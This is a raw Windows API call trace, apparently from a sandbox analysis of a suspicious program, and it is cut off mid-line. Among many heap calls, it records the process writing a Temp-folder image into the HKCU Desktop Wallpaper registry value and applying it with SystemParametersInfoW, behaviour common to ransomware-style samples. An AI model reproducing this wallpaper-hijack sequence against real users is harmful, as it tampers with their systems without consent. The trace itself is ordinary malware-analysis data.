[0290.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0290.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0290.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0290.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0290.997] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0290.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0290.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0290.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0290.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0290.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0290.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0290.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0290.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0290.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0290.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0290.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0290.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0290.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0290.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0290.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0290.998] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0290.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0290.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0290.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0290.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0290.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0290.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0290.998] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0290.998] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0290.998] RegCloseKey (hKey=0x2d0) returned 0x0 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0290.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0290.999] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0290.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0290.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0290.999] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0291.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0291.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0291.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0291.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0291.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0291.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0291.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0291.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0291.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0291.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0291.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0291.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0291.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0291.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0291.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0291.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0291.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0291.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0291.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0291.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0291.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0291.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0291.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0291.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0291.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0291.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0291.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0291.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0291.038] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0291.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0291.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0291.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0291.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0291.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0291.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0291.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0291.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0291.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0291.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0291.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0291.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0291.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0291.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0291.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0291.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0291.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0291.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0291.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0291.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0291.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0291.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0291.041] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0291.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0291.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0291.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0291.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0291.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0291.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0291.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0291.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0291.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0291.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0291.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0291.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0291.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0291.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0291.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0291.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0291.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0291.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0291.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0291.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0291.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0291.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0291.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0291.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0291.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0291.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0291.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0291.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0291.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0291.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0291.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0291.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0291.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0291.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0291.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0291.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0291.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0291.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0291.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0291.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0291.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0291.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0291.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0291.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0291.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0291.043] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0291.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0291.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0291.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0291.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69c08 [0291.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69c08, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0291.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0291.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0291.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0291.044] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0291.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0291.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0291.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0291.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0291.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0291.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0291.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0291.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0291.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0291.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0291.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0291.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0291.045] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0291.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f148d8 [0291.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0291.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0291.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0291.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0291.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 